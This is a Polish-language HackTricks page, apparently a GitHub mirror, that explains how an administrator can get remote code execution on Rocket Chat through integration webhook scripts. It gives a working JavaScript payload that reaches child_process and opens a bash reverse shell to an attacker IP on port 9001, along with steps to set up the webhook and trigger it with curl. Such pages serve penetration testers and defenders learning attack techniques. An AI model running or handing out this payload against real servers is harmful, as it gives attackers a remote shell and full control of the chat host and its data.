mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 23:20:49 +00:00
4 KiB
4 KiB
Rocket Chat
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
{% embed url="https://websec.nl/" %}
RCE
Jeśli jesteś administratorem w Rocket Chat, możesz uzyskać RCE.
- Przejdź do
Integrations
i wybierzNew Integration
, a następnie wybierz dowolną:Incoming WebHook
lubOutgoing WebHook
. /admin/integrations/incoming
- Zgodnie z dokumentacją, obie używają ES2015 / ECMAScript 6 (w zasadzie JavaScript) do przetwarzania danych. Więc zdobądźmy rev shell dla javascript jak:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Skonfiguruj WebHook (kanał i post jako nazwa użytkownika muszą istnieć):
- Skonfiguruj skrypt WebHook:
- Zapisz zmiany
- Uzyskaj wygenerowany URL WebHook:
- Wywołaj go za pomocą curl i powinieneś otrzymać rev shell
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.